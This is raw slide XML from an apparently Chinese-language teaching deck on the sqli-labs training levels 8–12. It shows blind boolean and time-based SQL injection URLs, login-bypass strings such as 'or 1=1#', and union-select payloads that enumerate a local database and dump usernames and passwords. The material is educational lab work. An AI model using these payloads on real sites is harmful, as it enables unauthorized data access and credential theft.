            <a:ext cx="11596255" cy="4655128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-8/?id=1‘ and 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 = 0x7573657273 limit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&gt;10 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同理，进行判断表中的字段，然后进行判断。可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password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7. http://127.0.0.1/sqli/Less-8/?id=1‘  and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username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,1),1,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)) &gt;10 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同理，进行判断，最后再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行判断。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因为猜解速度较慢，可以配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的脚本来使用。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14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6B1F7-21FC-4CE5-AA33-E29A1785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1458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补充知识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12B7C-9C1C-4850-A6B8-0425A9FE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785763" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IF(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>condition,A,B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>condition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，则执行语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，否则执行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例： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select if(1&gt;2,4,5);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回的结果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（如果是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令行中使用，首先要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>use xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库才行）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1C6BC5-BD7B-4C28-BCFB-7FA62A39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93" y="4202107"/>
            <a:ext cx="4220968" cy="158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1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E548-ADE7-4EF0-9F87-9B10DEB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838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Less-8_01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法二  时间盲注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61F82-4B95-4D31-B77F-4CD0E632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094509"/>
            <a:ext cx="11596255" cy="5167746"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.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/Less-8/?id=1‘ and sleep(5)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用延迟的方法判断是否存在注入漏洞。当然判断是否存在注入漏洞的方法很多。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.  http://127.0.0.1/sqli/Less-8/?id=1‘ and if(length(database()) = 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dirty="0"/>
              <a:t>,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候很快加载，而为其他值得时候加载较慢（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>左右），那就说明此时数据库的长度就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security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3. http://127.0.0.1/sqli/Less-8/?id=1' and if(ascii(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database()),1,1)) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,1,sleep(5))--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果当前数据库的第一个字母的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候，会立刻返回结果，否则执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5s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4. http://127.0.0.1/sqli/Less-8/?id=1‘ and if(ascii(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,1),1,1))&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>112</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同理判断数据库中的第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个数据库的第一位的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的值是不是大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>112</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（实际中是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>115</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），如果是的则速度返回，否则延时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回结果。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其余步骤与法一基本类似，可以采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注脚本使用。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12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E548-ADE7-4EF0-9F87-9B10DEB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838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61F82-4B95-4D31-B77F-4CD0E632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607127"/>
            <a:ext cx="11596255" cy="4655128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.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/Less-9/?id=1‘  order by 3999--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候，此时无论如何都是回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>you are in….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所以无法使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行判断。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.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/Less-9/?id=1‘ and sleep(5)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当存在注入漏洞时，可以使用延迟注入进行判断，此时若存在漏洞，则睡眠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后再返回结果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.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/Less-9/?id=1‘ and if(length(database())=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dirty="0"/>
              <a:t>,1,sleep(5)); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过返回时间进行判断，此时如果数据库长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，则可以较快返回。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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4,1),1,1))&gt;1112,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中同样的方法进行判断即可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因为盲注属于猜解，推荐使用脚本进行操作。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5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1B976-BF02-484E-8DF7-33CDCAD4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650111"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考必读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0CFC3-B3D4-4F3C-841E-07704392E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本次分享的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中很多教程均参考至互联网，而且只是作为教学使用，请勿商用和其他非法用途，若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中存在错误等信息，请和我联系：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>crow_821@163.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>， 或者是在微信公众号：乌鸦安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 给我留言，我会第一时间进行修改！如果你在学习中有任何的问题和困难，也可以和我联系，我告诉你我遇到困难的时候是如何退缩的！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>哈哈，玩笑话，有问题可以发我邮箱或者是留言，我看到之后都会答复的！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>免费分享不易，难免有错，请多多指教！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中的最好不好直接复制，很多的单引号都变成了中文的单引号了，大家可以自己手打一下，练习练习。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E548-ADE7-4EF0-9F87-9B10DEB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838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61F82-4B95-4D31-B77F-4CD0E632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607127"/>
            <a:ext cx="11596255" cy="4655128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Less-10/?id=1“ and sleep(11)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只是将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的单引号换成了双引号，其余的均相同。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209601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FCFCF-27C9-42B9-8E75-EC10C907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27603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D5BDF-D389-4EFC-B190-196570A6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POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关卡，我们需要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行配合操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同样在代码中加入两行：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql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echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;";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003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Less-11_01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498764"/>
            <a:ext cx="11762509" cy="6151417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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内容： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘ &amp; passwd=1&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回的结果显示你存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语法错误，证明存在注入漏洞。或这是直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中填写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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中随便写判断一下是否存在注入漏洞。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直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中填写 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin‘ or 1=1#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（此处不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要使用在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是适用的）即： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a’ or 1=1 #&amp; passwd=a &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时登录成功，可以验证存在注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位置进行验证：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a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a‘ or 1=1# &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，登录成功，开始构造！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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a‘ order by 3#&amp;passwd=a &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是使用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a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a’ order by 2# &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同样可以进行判断，最后得出一共有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>两列。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a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a‘ union select database(),2  # &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询到当前的数据库为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，或者是使用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a’ union select database(),2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>均可以查询到当前的数据库，当然也可以查询其它信息。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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a‘ union select 1,(select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1,1)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以查询到当前的第一个数据库，或者是使用命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a’ union select 1,(select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schema_name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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以得到所有的数据库。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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a‘ union select 1,(select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table_name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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库中的所有的表信息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4518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Less-11_02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498764"/>
            <a:ext cx="11762509" cy="6151417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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a‘ union select 1,(select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column_name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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表获得里面的列值：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,username,password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a‘ union select 1,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concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(’~‘,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>))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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时就可以得到里面所有的数据。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003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Less-12_01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1065747"/>
            <a:ext cx="11762509" cy="5584433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首先进行尝试：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin‘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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时只是显示登陆失败，没有其他的回显，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>换为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uname</a:t>
            </a:r>
            <a:r>
